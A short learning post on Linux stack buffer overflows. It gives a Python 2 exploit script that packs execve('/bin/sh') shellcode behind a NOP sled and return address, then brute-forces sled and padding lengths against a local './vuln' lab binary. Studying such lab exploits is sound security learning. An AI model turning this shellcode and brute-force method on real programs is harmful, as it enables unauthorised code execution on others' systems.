A trick in Exploit Dev
While learning Linux BOF (buffer overflows) I read this article, https://sploitfun.wordpress.com/2015/06/23/integer-overflow/ . The exploit given in the original article did not work for me; in that case, besides calculating and filling the buffer by hand, there is another way to reproduce the problem:
#!/usr/bin/env python
# Python 2 script (print statements, str payloads), as in the original post.
import struct
from subprocess import call

def fuzzme(i, j):
    # i = number of NOPs in the sled, j = amount of trailing padding
    print i, j
    arg1 = "sploitfun"
    # stack address where shellcode is copied.
    ret_addr = 0xbfffefb0
    # spawn a shell
    # execve(/bin/sh)
    scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

    # endianness conversion (pack as 32-bit little-endian)
    def conv(num):
        return struct.pack("<I", num)

    # arg2 = Junk + RA + NOP's + Shellcode
    arg2 = "A" * 24
    arg2 += conv(ret_addr)
    arg2 += "\x90" * i
    arg2 += scode
    arg2 += "C" * j
    print "Calling vulnerable program"
    call(["./vuln", arg1, arg2])

if __name__ == '__main__':
    # try every combination of sled length and padding instead of computing them
    for i in range(1, 300):
        for j in range(1, 300):
            fuzzme(i, j)

Simple and brutal...